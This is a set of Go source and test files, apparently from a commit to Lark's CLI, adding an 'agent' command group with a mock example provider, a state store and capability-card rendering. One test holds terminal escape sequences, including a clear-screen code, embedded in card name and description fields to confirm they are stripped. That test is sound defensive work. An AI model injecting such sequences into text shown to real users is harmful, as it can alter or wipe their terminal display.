_, err := p.Send(ctx, agent.SendInput{Text: "hi", ContextID: "ctx_x", TaskID: "task_x"})
if prob, ok := errs.ProblemOf(err); !ok || prob.Subtype != errs.SubtypeFailedPrecondition {
t.Fatalf("--task-id follow-up should be failed_precondition, got %v", err)
}
_, err = p.Send(ctx, agent.SendInput{Text: "hi", ContextID: "ctx_missing"})
if prob, ok := errs.ProblemOf(err); !ok || prob.Subtype != errs.SubtypeInvalidArgument {
t.Fatalf("unknown context id should be invalid_argument, got %v", err)
}
}
// TestDeleteContext verifies deleting a context also cleans up the tasks under it.
func TestDeleteContext(t *testing.T) {
swapStore(t)
p := buildProvider(t, "echo")
ctx := context.Background()
task, err := p.Send(ctx, agent.SendInput{Text: "bye"})
if err != nil {
t.Fatal(err)
}
if err := p.DeleteContext(ctx, task.ContextID); err != nil {
t.Fatal(err)
}
if _, err := p.GetTask(ctx, task.TaskID); err == nil {
t.Fatal("after deleting the context its tasks should be unqueryable")
}
ctxs, err := p.ListContexts(ctx)
if err != nil {
t.Fatal(err)
}
if len(ctxs) != 0 {
t.Fatalf("no contexts should remain after deletion, got %+v", ctxs)
}
}
// agentReply returns the first text reply from the agent role in the task.
func agentReply(t *testing.T, task *agent.AgentTask) string {
t.Helper()
for _, m := range task.Messages {
if m.Role != "agent" {
continue
}
for _, part := range m.Parts {
if part.Type == "text" {
return part.Text
}
}
}
t.Fatalf("task is missing an agent text reply: %+v", task.Messages)
return ""
}

324
agent/example/state.go Normal file
View File

@@ -0,0 +1,324 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package example
import (
"crypto/rand"
"encoding/hex"
"encoding/json"
"os"
"path/filepath"
"sort"
"sync"
"time"
"github.com/larksuite/cli/errs"
"github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/vfs"
)
// ============================================================================
// In-memory state machine (teaching focus: concurrency safety of package-level
// state + the CLI process boundary)
//
// A real provider's context/task state lives on the server, so the adapter is
// naturally stateless; example is a pure mock and must manage state itself. Two
// disciplines the integrator needs to know:
//
// 1. Concurrency safety: provider instances may be constructed / called
// concurrently (e.g. list's probe alongside the real call), so package-level
// mutable state must be locked. A single coarse-grained Mutex covers all
// reads and writes here — the mock does not chase throughput; correctness comes first.
// 2. CLI process boundary: every lark-cli command is a fresh process, so a pure
// in-memory map does not survive a single command — after `send`, a
// `task get` would find nothing. So a lazy JSON snapshot layer sits beneath
// the in-memory map (under os.TempDir, last-writer-wins) to make the offline
// demo chain work across commands. A real provider neither needs nor should
// have this layer — it is a mock-only demo device.
//
// Note that the snapshot is loaded lazily (only on the first real read/write of
// state): Register's zero-value Deps probe constructs a provider once at
// registration time, and construction must have no side effects (the registry.go
// contract), so Factory / Card / ListAgents must not touch store.
// ============================================================================
// taskRecord is a task's storage form: a full AgentTask snapshot + owning agent
// + creation sequence number (list output sorts by creation order to guarantee
// stable enumeration).
type taskRecord struct {
AgentID string `json:"agent_id"`
Seq int `json:"seq"`
Task agent.AgentTask `json:"task"`
}
// contextRecord is a multi-turn context's storage form. TaskIDs is appended in
// creation order — len(TaskIDs)+1 is the next round number, which echo uses to
// demonstrate "context memory".
type contextRecord struct {
AgentID string `json:"agent_id"`
ContextID string `json:"context_id"`
CreatedAt string `json:"created_at"`
Title string `json:"title,omitempty"`
Seq int `json:"seq"`
TaskIDs []string `json:"task_ids"`
}
// memoryStore is the package-level state machine itself: mu covers all fields;
// path is the JSON snapshot location; loaded ensures the snapshot is read only
// once, on first access.
type memoryStore struct {
mu sync.Mutex
path string
loaded bool
Contexts map[string]*contextRecord `json:"contexts"`
Tasks map[string]*taskRecord `json:"tasks"`
NextSeq int `json:"next_seq"`
}
// store is the package-level singleton. Tests use swapStoreForTest to replace it
// with an instance pointing at t.TempDir, avoiding cross-contamination between
// tests and between tests and the local demo state.
var store = newMemoryStore(filepath.Join(os.TempDir(), "lark-cli-example-agent.json"))
func newMemoryStore(path string) *memoryStore {
return &memoryStore{
path: path,
Contexts: map[string]*contextRecord{},
Tasks: map[string]*taskRecord{},
}
}
// loadLocked lazily reads in the snapshot (the caller must already hold the
// lock). A missing / corrupt snapshot is uniformly treated as empty state — the
// mock's demo data is not worth erroring over, so it just starts fresh.
func (s *memoryStore) loadLocked() {
if s.loaded {
return
}
s.loaded = true
data, err := vfs.ReadFile(s.path)
if err != nil {
return
}
var snap memoryStore
if json.Unmarshal(data, &snap) != nil {
return
}
if snap.Contexts != nil {
s.Contexts = snap.Contexts
}
if snap.Tasks != nil {
s.Tasks = snap.Tasks
}
s.NextSeq = snap.NextSeq
}
// saveLocked writes the current state back to the snapshot (the caller must
// already hold the lock). A write failure returns a typed internal error
// (storage subtype) — the mock does not swallow errors either: silently losing
// state would make the next command report "task not found", which is harder to
// diagnose than a clear error.
func (s *memoryStore) saveLocked() error {
data, err := json.MarshalIndent(s, "", " ")
if err != nil {
return errs.NewInternalError(errs.SubtypeStorage, "序列化 example 状态失败: %v", err).WithCause(err)
}
if err := vfs.WriteFile(s.path, data, 0o600); err != nil {
return errs.NewInternalError(errs.SubtypeStorage, "写 example 状态快照失败: %v", err).WithCause(err)
}
return nil
}
// newID generates a random id that is safe for [A-Za-z0-9_-]. The character set
// deliberately aligns with the command layer's meta.next interpolation
// allowlist (cmd/agent/send.go safeNextID): the id is spliced into a command
// string "the AI copies and runs", and an id with shell metacharacters would
// cause the whole hint to be suppressed.
func newID(prefix string) string {
var b [6]byte
if _, err := rand.Read(b[:]); err != nil {
// crypto/rand being unavailable is an environment-level failure; the mock
// degrades to a timestamp that still satisfies the character set.
return prefix + "_" + time.Now().UTC().Format("20060102150405")
}
return prefix + "_" + hex.EncodeToString(b[:])
}
// createContext creates a new context and returns its id (the first-turn send goes here).
func (s *memoryStore) createContext(agentID, title string) (string, error) {
s.mu.Lock()
defer s.mu.Unlock()
s.loadLocked()
id := newID("ctx")
s.NextSeq++
s.Contexts[id] = &contextRecord{
AgentID: agentID,
ContextID: id,
CreatedAt: time.Now().UTC().Format(time.RFC3339),
Title: title,
Seq: s.NextSeq,
}
return id, s.saveLocked()
}
// createTask appends a task under ctxID: validate context ownership → compute
// the round (which task number in this conversation) → call build under the lock
// to construct the task → insert and write the snapshot. build runs inside the
// lock to guarantee "compute the round" and "store the task" are atomic, so two
// concurrent sends never get the same round.
// An unknown / cross-agent context id returns a typed validation error (teaching
// point: every error a provider returns must be typed — a bare error would land
// as internal/exit 5, whereas this is clearly "the caller passed a wrong
// argument", semantically invalid_argument/exit 2, and the AI relies on this
// classification to decide between "fix the argument and retry" and "report an
// environment failure").
func (s *memoryStore) createTask(agentID, ctxID string, build func(round int) agent.AgentTask) (agent.AgentTask, error) {
s.mu.Lock()
defer s.mu.Unlock()
s.loadLocked()
ctx, ok := s.Contexts[ctxID]
if !ok || ctx.AgentID != agentID {
return agent.AgentTask{}, errs.NewValidationError(errs.SubtypeInvalidArgument,
"未知的 context id '%s'example:%s 名下不存在)", ctxID, agentID).
WithHint("运行 lark-cli agent context list example:%s 查看现有会话", agentID)
}
task := build(len(ctx.TaskIDs) + 1)
s.NextSeq++
s.Tasks[task.TaskID] = &taskRecord{AgentID: agentID, Seq: s.NextSeq, Task: task}
ctx.TaskIDs = append(ctx.TaskIDs, task.TaskID)
return task, s.saveLocked()
}
// getTask fetches a task snapshot by id (returns a copy by value, so the command
// layer's in-place edits like normalizeTask do not write through to store). A
// cross-agent task is treated as "not found", without leaking another agent's state.
func (s *memoryStore) getTask(agentID, taskID string) (agent.AgentTask, error) {
s.mu.Lock()
defer s.mu.Unlock()
s.loadLocked()
rec, ok := s.Tasks[taskID]
if !ok || rec.AgentID != agentID {
return agent.AgentTask{}, errs.NewValidationError(errs.SubtypeInvalidArgument,
"未知的 task id '%s'example:%s 名下不存在)", taskID, agentID).
WithHint("运行 lark-cli agent task list example:%s 查看现有任务", agentID)
}
return rec.Task, nil
}
// setTaskState updates a task's state (used by reporter's cancel).
func (s *memoryStore) setTaskState(taskID string, state agent.TaskState) error {
s.mu.Lock()
defer s.mu.Unlock()
s.loadLocked()
rec, ok := s.Tasks[taskID]
if !ok {
return errs.NewValidationError(errs.SubtypeInvalidArgument, "未知的 task id '%s'", taskID)
}
rec.Task.State = state
rec.Task.IsTerminal = state.IsTerminal()
return s.saveLocked()
}
// listTasks lists an agent's task summaries, optionally filtered by contextID
// (empty string means no filter), output in creation order. IsTerminal is
// carried along here for convenience, but the command layer re-derives it from
// State via normalizeTask* (single source), so the integrator need not worry
// about this field.
func (s *memoryStore) listTasks(agentID, contextID string) []agent.TaskSummary {
s.mu.Lock()
defer s.mu.Unlock()
s.loadLocked()
recs := make([]*taskRecord, 0, len(s.Tasks))
for _, rec := range s.Tasks {
if rec.AgentID != agentID {
continue
}
if contextID != "" && rec.Task.ContextID != contextID {
continue
}
recs = append(recs, rec)
}
sort.Slice(recs, func(i, j int) bool { return recs[i].Seq < recs[j].Seq })
out := make([]agent.TaskSummary, 0, len(recs))
for _, rec := range recs {
out = append(out, agent.TaskSummary{
TaskID: rec.Task.TaskID,
ContextID: rec.Task.ContextID,
State: rec.Task.State,
IsTerminal: rec.Task.IsTerminal,
})
}
return out
}
// listContexts lists an agent's context summaries, output in creation order.
func (s *memoryStore) listContexts(agentID string) []agent.ContextSummary {
s.mu.Lock()
defer s.mu.Unlock()
s.loadLocked()
recs := make([]*contextRecord, 0, len(s.Contexts))
for _, ctx := range s.Contexts {
if ctx.AgentID == agentID {
recs = append(recs, ctx)
}
}
sort.Slice(recs, func(i, j int) bool { return recs[i].Seq < recs[j].Seq })
out := make([]agent.ContextSummary, 0, len(recs))
for _, ctx := range recs {
out = append(out, agent.ContextSummary{
ContextID: ctx.ContextID,
CreatedAt: ctx.CreatedAt,
Title: ctx.Title,
})
}
return out
}
// getContext returns a context's detail (including its task summaries, in creation order).
func (s *memoryStore) getContext(agentID, ctxID string) (*agent.ContextDetail, error) {
s.mu.Lock()
defer s.mu.Unlock()
s.loadLocked()
ctx, ok := s.Contexts[ctxID]
if !ok || ctx.AgentID != agentID {
return nil, errs.NewValidationError(errs.SubtypeInvalidArgument,
"未知的 context id '%s'example:%s 名下不存在)", ctxID, agentID).
WithHint("运行 lark-cli agent context list example:%s 查看现有会话", agentID)
}
detail := &agent.ContextDetail{
ContextID: ctx.ContextID,
CreatedAt: ctx.CreatedAt,
Title: ctx.Title,
}
for _, tid := range ctx.TaskIDs {
if rec, ok := s.Tasks[tid]; ok {
detail.Tasks = append(detail.Tasks, agent.TaskSummary{
TaskID: rec.Task.TaskID,
ContextID: rec.Task.ContextID,
State: rec.Task.State,
IsTerminal: rec.Task.IsTerminal,
})
}
}
return detail, nil
}
// deleteContext deletes a context and its tasks (a destructive operation, already gated by --yes in the command layer).
func (s *memoryStore) deleteContext(agentID, ctxID string) error {
s.mu.Lock()
defer s.mu.Unlock()
s.loadLocked()
ctx, ok := s.Contexts[ctxID]
if !ok || ctx.AgentID != agentID {
return errs.NewValidationError(errs.SubtypeInvalidArgument,
"未知的 context id '%s'example:%s 名下不存在)", ctxID, agentID).
WithHint("运行 lark-cli agent context list example:%s 查看现有会话", agentID)
}
for _, tid := range ctx.TaskIDs {
delete(s.Tasks, tid)
}
delete(s.Contexts, ctxID)
return s.saveLocked()
}

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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
// Package agent is the top-level business layer that wires the in-repo agent
// providers into the framework registry (internal/agent). It mirrors the events
// layering: the framework/SPI lives in internal/agent, the concrete providers
// live under agent/<scheme>/, and this package blank-imports each so their
// init() self-registration runs. Blank-import this package from cmd to populate
// the provider registry.
//
// To onboard a new provider: add its package under agent/<scheme>/ and add one
// matching blank import below.
package agent
import (
// example is the in-repo onboarding template and offline demo provider
// (in-memory mock, zero network); its init() registers the "example" scheme.
_ "github.com/larksuite/cli/agent/example"
)

29
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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"github.com/spf13/cobra"
"github.com/larksuite/cli/internal/cmdutil"
)
// NewCmdAgent builds the `agent` command group: a provider-agnostic surface
// that drives remote A2A agents with constant verbs. It is a pure group with
// no RunE, so an unknown subcommand is reported rather than silently
// swallowed. All five verbs (list/card/send/task/context) are wired here; task
// and context are themselves nested groups.
func NewCmdAgent(f *cmdutil.Factory) *cobra.Command {
cmd := &cobra.Command{
Use: "agent",
Short: "Drive first-party remote agents (A2A: send / start task / poll / fetch result)",
Long: "Drive Feishu first-party remote agents with a constant verb set. An agent_ref looks like <scheme>:<agent_id> (e.g. example:echo). Read capabilities with `agent card <agent_ref>` first, then pick verbs by capability.",
}
cmd.AddCommand(NewCmdAgentList(f))
cmd.AddCommand(NewCmdAgentCard(f))
cmd.AddCommand(NewCmdAgentSend(f, nil))
cmd.AddCommand(NewCmdAgentTask(f))
cmd.AddCommand(NewCmdAgentContext(f))
return cmd
}

34
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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import "testing"
// TestAgentCommandTree pins the shape of the `agent` command tree: the group
// itself must have no RunE/Run (a bare group whose unknown subcommands surface
// an error rather than being silently swallowed), and it must expose all five
// verbs plus the nested task/context sub-groups.
func TestAgentCommandTree(t *testing.T) {
cmd := NewCmdAgent(nil)
if cmd.RunE != nil || cmd.Run != nil {
t.Error("agent group should not have RunE (otherwise it conflicts with unknownSubcommandGuard)")
}
want := []string{"list", "card", "send", "task", "context"}
for _, name := range want {
if findSub(cmd, name) == nil {
t.Errorf("missing subcommand %s", name)
}
}
// task/context are nested groups
if task := findSub(cmd, "task"); task == nil {
t.Error("missing agent task group")
} else if findSub(task, "get") == nil {
t.Error("missing agent task get")
}
if ctxCmd := findSub(cmd, "context"); ctxCmd == nil {
t.Error("missing agent context group")
} else if findSub(ctxCmd, "delete") == nil {
t.Error("missing agent context delete")
}
}

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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"fmt"
"io"
"strings"
"github.com/spf13/cobra"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/output"
)
// cardOptions holds all inputs for `agent card <ref>`.
type cardOptions struct {
Factory *cmdutil.Factory
Cmd *cobra.Command
Ref string
As string
Format string
}
// NewCmdAgentCard builds `agent card <ref>`: fetch and display an agent's
// capability card. Adapters synthesize the card statically from their known
// capability matrix — no API call is made, and the command works offline /
// under mock. Risk=read.
func NewCmdAgentCard(f *cmdutil.Factory) *cobra.Command {
opts := &cardOptions{Factory: f}
cmd := &cobra.Command{
Use: "card <agent_ref>",
Short: "Show a remote agent's capability card (capabilities / parameters / identity)",
Long: "Fetch and show an agent's capability card. Use its capabilities to decide which verbs are available and its parameters to decide the --param a send needs. Some providers synthesize the card statically without calling the remote API.",
Args: exactArgsWithUsage(1),
RunE: func(cmd *cobra.Command, args []string) error {
if err := validateFormat(opts.Format); err != nil {
return err
}
opts.Cmd = cmd
opts.Ref = args[0]
return agentCardRun(opts)
},
}
cmd.Flags().StringVar(&opts.Format, "format", "json", formatFlagHelp)
cmd.Flags().String("jq", "", "用 jq 表达式过滤 JSON 输出")
if f != nil {
cmdutil.AddAPIIdentityFlag(cmd.Context(), cmd, f, &opts.As)
} else {
// f is nil only in construction-time unit tests; register a bare --as so
// the flag surface is still assertable without a Factory.
cmd.Flags().StringVar(&opts.As, "as", "", "identity type: user | bot")
}
cmdutil.SetRisk(cmd, cmdutil.RiskRead)
return cmd
}
// agentCardRun resolves the provider addressed by ref and emits its capability
// card. The card is first-party static data (not agent-generated content), so
// it bypasses content-safety scanning. The JSON success envelope is the
// default; --format pretty opts into the human-readable listing. A --jq
// expression forces JSON (jq operates on the envelope) and, when present,
// filters stdout.
func agentCardRun(opts *cardOptions) error {
f := opts.Factory
// Card synthesis is API-free, so resolve without requiring a
// configured client: `agent card` must work offline / before config init.
p, id, err := resolveProviderNoClient(f, opts.Cmd, opts.Ref, opts.As)
if err != nil {
return err
}
r, err := iagent.ParseRef(opts.Ref)
if err != nil {
return wrapRefResolveError(err)
}
card, err := iagent.BuildCard(opts.Cmd.Context(), r.Scheme, r.AgentID, p)
if err != nil {
return err
}
jq := jqExpr(opts.Cmd)
// pretty is a human view only; a --jq expression implies structured JSON,
// so it takes precedence over the pretty format.
if opts.Format == "pretty" && jq == "" {
printCardPretty(f.IOStreams.Out, card)
return nil
}
env := output.Envelope{
OK: true,
Identity: string(id),
Data: card,
Notice: output.GetNotice(),
}
if jq != "" {
return output.JqFilter(f.IOStreams.Out, env, jq)
}
output.PrintJson(f.IOStreams.Out, env)
return nil
}
// printCardPretty writes a compact human-readable view of an agent card:
// identity header (with per-identity preconditions), the sorted capability
// matrix, declared parameters and skills — the key constraints an AI reads
// from json must also be visible to a human. Remote cards carry
// agent-controlled Name/Description/Desc
// strings, so every such field is ANSI-stripped before hitting the terminal.
// Nil cards degrade to a placeholder line rather than panicking.
func printCardPretty(w io.Writer, card *iagent.AgentCard) {
if card == nil {
fmt.Fprintln(w, "(no card)")
return
}
// Dynamic cards carry a Name; static cards fall back to the provider label.
name := card.Name
if name == "" {
name = card.ProviderLabel
}
fmt.Fprintf(w, "%s (%s)\n", stripANSI(name), card.AgentID)
if card.Description != "" {
fmt.Fprintf(w, " %s\n", stripANSI(card.Description))
}
if len(card.Identity) > 0 {
ids := make([]string, 0, len(card.Identity))
for _, spec := range card.Identity {
id := string(spec.Type)
if spec.Precondition != "" {
id += "(前置: " + stripANSI(spec.Precondition) + ""
}
ids = append(ids, id)
}
fmt.Fprintf(w, " identity: %s\n", strings.Join(ids, ", "))
}
fmt.Fprintln(w, " capabilities:")
// Capabilities is a closed struct; iterate in fixed alphabetical key order,
// matching the sorted output of the earlier map-based representation.
for _, k := range []string{
iagent.CapArtifactDownload,
iagent.CapFileInput,
iagent.CapInputRequired,
iagent.CapMultiTurn,
iagent.CapTaskCancel,
iagent.CapTaskGet,
iagent.CapTaskList,
} {
mark := "no"
if card.Supports(k) {
mark = "yes"
}
fmt.Fprintf(w, " %-20s %s\n", k, mark)
}
if len(card.Parameters) > 0 {
fmt.Fprintln(w, " parameters:")
for _, pr := range card.Parameters {
req := ""
if pr.Required {
req = " (required)"
}
fmt.Fprintf(w, " %s: %s%s", pr.Name, pr.Type, req)
if pr.Desc != "" {
fmt.Fprintf(w, " — %s", stripANSI(pr.Desc))
}
fmt.Fprintln(w)
}
}
if len(card.Skills) > 0 {
fmt.Fprintln(w, " skills:")
for _, sk := range card.Skills {
name := sk.Name
if name == "" {
name = sk.ID
}
fmt.Fprintf(w, " %s\n", stripANSI(name))
}
}
}

286
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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"bytes"
"context"
"encoding/json"
"strings"
"testing"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/output"
)
// cardTestOpts builds a cardOptions driving agentCardRun against a real
// (test) Factory. The example card is synthesized statically, so no API call
// is made and stdout carries the capability card envelope.
func cardTestOpts(t *testing.T, ref string) (*cardOptions, *core.CliConfig) {
t.Helper()
cfg := &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu}
f, _, _, _ := cmdutil.TestFactory(t, cfg)
cmd := resolveCmd(t, true, "bot") // reuses the common_test.go helper (--as=bot)
return &cardOptions{Factory: f, Cmd: cmd, Ref: ref, As: "bot", Format: "json"}, cfg
}
// TestAgentCardRun_ExampleStaticCard verifies that `agent card example:echo`
// returns the statically synthesized capability card (no API), with
// task_cancel gated off and multi_turn on, and the agent_id echoed from the
// ref.
func TestAgentCardRun_ExampleStaticCard(t *testing.T) {
opts, _ := cardTestOpts(t, "example:echo")
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentCardRun(opts); err != nil {
t.Fatalf("card should be statically synthesized and not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("output should be valid envelope JSON: %v", err)
}
if !env.OK {
t.Errorf("ok should be true: %+v", env)
}
data, ok := env.Data.(map[string]interface{})
if !ok {
t.Fatalf("data should be a card object, got %T", env.Data)
}
if data["agent_id"] != "echo" {
t.Errorf("agent_id should echo the ref, got %v", data["agent_id"])
}
if data["provider"] != "example" {
t.Errorf("provider should be example, got %v", data["provider"])
}
// source was removed from the card (schema tightening).
if _, present := data["source"]; present {
t.Errorf("card should no longer carry a source field, got %v", data["source"])
}
caps, ok := data["capabilities"].(map[string]interface{})
if !ok {
t.Fatalf("capabilities should be an object, got %T", data["capabilities"])
}
if caps["task_cancel"] != false {
t.Errorf("echo task_cancel should be false, got %v", caps["task_cancel"])
}
if caps["multi_turn"] != true {
t.Errorf("echo multi_turn should be true, got %v", caps["multi_turn"])
}
// parameters / identity must serialize as non-null (guard against omitempty
// regression): parameters is always an array (empty [] for example),
// identity is a non-empty array.
if params, ok := data["parameters"].([]interface{}); !ok {
t.Errorf("parameters should be a non-null array, got %T (%v)", data["parameters"], data["parameters"])
} else if len(params) != 0 {
t.Errorf("example parameters should be an empty array, got %v", params)
}
if ids, ok := data["identity"].([]interface{}); !ok || len(ids) == 0 {
t.Errorf("identity should be a non-null non-empty array, got %T (%v)", data["identity"], data["identity"])
}
// card no longer exposes scope: the required_scopes field was removed from
// AgentCard (scope is an internal registration item used only for preflight).
if _, present := data["required_scopes"]; present {
t.Errorf("card should no longer carry a required_scopes field, got %v", data["required_scopes"])
}
}
// TestAgentCardRun_PrettyFormat verifies that with --format pretty (opt-in
// since the json default flip), the card renders as a human-readable listing.
// The output must surface the identity and capability names in plain text so
// the stream is not valid envelope JSON.
func TestAgentCardRun_PrettyFormat(t *testing.T) {
opts, _ := cardTestOpts(t, "example:echo")
opts.Format = "pretty"
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentCardRun(opts); err != nil {
t.Fatalf("card pretty should not error: %v", err)
}
text := string(out.Bytes())
// A pretty rendering is human text, not a JSON envelope.
var env output.Envelope
if json.Unmarshal(out.Bytes(), &env) == nil && env.OK {
t.Fatalf("pretty format should not output a JSON envelope: %s", text)
}
if !strings.Contains(text, "echo") {
t.Errorf("pretty output should contain agent_id: %s", text)
}
// multi_turn is a declared capability of the echo card; it must appear.
if !strings.Contains(text, "multi_turn") {
t.Errorf("pretty output should list capabilities: %s", text)
}
}
// TestAgentCardRun_JSONFormat pins that --format json still emits the envelope.
func TestAgentCardRun_JSONFormat(t *testing.T) {
opts, _ := cardTestOpts(t, "example:echo")
opts.Format = "json"
out := opts.Factory.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentCardRun(opts); err != nil {
t.Fatalf("card json should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("json format should be a valid envelope: %v (%s)", err, string(out.Bytes()))
}
if !env.OK {
t.Errorf("ok should be true: %+v", env)
}
}
// TestAgentCardJqFlagRegisteredAndConsumed pins the quality-review fix: the
// --jq flag must actually be REGISTERED on `agent card` (the run path already
// called jqExpr/JqFilter, but without the flag `--jq` was an unknown-flag
// exit 2 — and the skill doc teaches AI to copy `card ... --jq`). Executed via
// the real command so registration + consumption are proven together.
func TestAgentCardJqFlagRegisteredAndConsumed(t *testing.T) {
cfg := &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu}
f, _, _, _ := cmdutil.TestFactory(t, cfg)
cmd := NewCmdAgentCard(f)
cmd.SetOut(&bytes.Buffer{})
cmd.SetErr(&bytes.Buffer{})
cmd.SetContext(context.Background())
cmd.SetArgs([]string{"example:echo", "--as", "bot", "--jq", ".data.agent_id"})
if err := cmd.Execute(); err != nil {
t.Fatalf("card --jq should not error: %v", err)
}
out := f.IOStreams.Out.(interface{ Bytes() []byte })
got := strings.TrimSpace(string(out.Bytes()))
if !strings.Contains(got, "echo") || strings.Contains(got, `"ok"`) {
t.Errorf("--jq .data.agent_id should output only the filtered result, got %q", got)
}
}
// TestPrintCardPretty_NilCard pins that a nil card degrades to a placeholder
// line instead of panicking (card.go nil branch).
func TestPrintCardPretty_NilCard(t *testing.T) {
out := &bytes.Buffer{}
printCardPretty(out, nil)
if !strings.Contains(out.String(), "(no card)") {
t.Errorf("nil card should print a placeholder line, got: %q", out.String())
}
}
// TestPrintCardPretty_AllOptionalFields exercises every optional-field branch of
// the pretty renderer that a minimal static card omits: the dynamic-card Name
// (taking precedence over ProviderLabel), Description, declared Parameters, and
// the Skills block (both the named skill and the id-fallback when Name is empty).
func TestPrintCardPretty_AllOptionalFields(t *testing.T) {
card := &iagent.AgentCard{
Provider: "demo",
ProviderLabel: "demo 自定义智能体",
Name: "Demo Agent", // only dynamic cards have Name; it should override ProviderLabel
AgentID: "agt_demo",
Description: "a helpful demo agent",
Identity: []iagent.IdentitySpec{
{Type: "user"},
{Type: "bot", Precondition: "需加入渠道白名单"},
},
Capabilities: iagent.Capabilities{
MultiTurn: true,
TaskCancel: false,
},
Parameters: []iagent.CardParam{
{Name: "locale", Type: "string", Required: true, Desc: "reply locale"},
},
Skills: []iagent.CardSkill{
{ID: "sk_1", Name: "Sales Analysis"},
{ID: "sk_2"}, // no Name → falls back to ID
},
}
out := &bytes.Buffer{}
printCardPretty(out, card)
text := out.String()
for _, want := range []string{
"Demo Agent (agt_demo)", // dynamic Name takes precedence over ProviderLabel
"a helpful demo agent", // Description branch
"identity: user, bot", // IdentitySpec types are joined
"需加入渠道白名单", // identity precondition must be visible in pretty (Task 11 wrap-up)
"locale", // Parameters branch
"skills:", // Skills block header
"Sales Analysis", // skill with a Name
"sk_2", // skill without a Name → id fallback
} {
if !strings.Contains(text, want) {
t.Errorf("pretty output should contain %q, got:\n%s", want, text)
}
}
}
// TestPrintCardPretty_StripsANSIFromRemoteFields pins that a remote card's
// agent-controlled Name/Description cannot smuggle ANSI escapes to the
// terminal (this sanitization is applied to every pretty surface).
func TestPrintCardPretty_StripsANSIFromRemoteFields(t *testing.T) {
card := &iagent.AgentCard{
Provider: "demo",
AgentID: "agt_demo",
Name: "\x1b[31mEvil\x1b[0m Agent",
Description: "desc\x1b[2Jwipe",
}
out := &bytes.Buffer{}
printCardPretty(out, card)
text := out.String()
if strings.Contains(text, "\x1b") {
t.Errorf("ANSI sequences in remote card fields must be stripped: %q", text)
}
if !strings.Contains(text, "Evil Agent") || !strings.Contains(text, "descwipe") {
t.Errorf("readable text should remain after stripping, got: %q", text)
}
}
// TestPrintCardPretty_StaticFallsBackToProviderLabel pins that a static card
// (no dynamic Name) renders its ProviderLabel as the header.
func TestPrintCardPretty_StaticFallsBackToProviderLabel(t *testing.T) {
card := &iagent.AgentCard{
Provider: "demo",
ProviderLabel: "demo 自定义智能体",
AgentID: "agt_demo",
}
out := &bytes.Buffer{}
printCardPretty(out, card)
if !strings.Contains(out.String(), "demo 自定义智能体 (agt_demo)") {
t.Errorf("should fall back to ProviderLabel when Name is empty, got:\n%s", out.String())
}
}
// TestAgentCardRun_InvalidRef surfaces a malformed ref as a validation error
// before any provider is built.
func TestAgentCardRun_InvalidRef(t *testing.T) {
opts, _ := cardTestOpts(t, "no-colon")
if err := agentCardRun(opts); err == nil {
t.Fatal("malformed ref should error")
}
}
// TestNewCmdAgentCard_ReadRiskAndArgs pins ExactArgs(1), read risk, and the
// presence of --format and --as flags.
func TestNewCmdAgentCard_ReadRiskAndArgs(t *testing.T) {
cmd := NewCmdAgentCard(nil)
if level, ok := cmdutil.GetRisk(cmd); !ok || level != cmdutil.RiskRead {
t.Errorf("agent card should be marked read risk, got level=%q ok=%v", level, ok)
}
if err := cmd.Args(cmd, []string{}); err == nil {
t.Error("agent card missing ref should report an argument error (ExactArgs 1)")
}
if err := cmd.Args(cmd, []string{"example:x"}); err != nil {
t.Errorf("agent card with a single ref should be valid: %v", err)
}
fl := cmd.Flags().Lookup("format")
if fl == nil {
t.Fatal("agent card should have a --format flag")
}
// Default output format is unified: card default flips from pretty to json.
if fl.DefValue != "json" {
t.Errorf("card --format default should flip to json, got %q", fl.DefValue)
}
if cmd.Flags().Lookup("as") == nil {
t.Error("agent card should have an --as flag")
}
}

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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
// Package agent implements the `agent` command tree: a provider-agnostic
// surface over remote A2A agents. This file holds the shared
// command-layer helpers: ref→provider resolution, --param validation against a
// Card, success-envelope emission, capability gating, and wait/watch polling.
package agent
import (
"context"
"errors"
"fmt"
"strings"
"time"
"github.com/spf13/cobra"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/output"
)
// supportedIdentities is the identity whitelist enforced for every agent
// command; provider cards advertise (a subset of) the same set.
var supportedIdentities = []string{string(core.AsUser), string(core.AsBot)}
// sleep is the package-level, test-injectable backoff sleep. It blocks for d or
// until ctx is done, returning true if the full duration elapsed and false if
// ctx was canceled first. Tests swap it for a no-op.
var sleep = func(ctx context.Context, d time.Duration) bool {
t := time.NewTimer(d)
defer t.Stop()
select {
case <-t.C:
return true
case <-ctx.Done():
return false
}
}
// resolveProviderNoClient resolves the effective identity, enforces the
// user|bot whitelist, and constructs the Provider addressed by ref WITHOUT
// requiring a configured API client. It is the resolution path for the
// API-free operations that always work — `agent card` (static synthesis) and
// `agent send --dry-run` (client-side preview) — so they succeed even before
// `lark-cli config init`. The provider's client is nil; only API-free methods
// (Card) may be called on it. A malformed ref or unknown provider scheme is
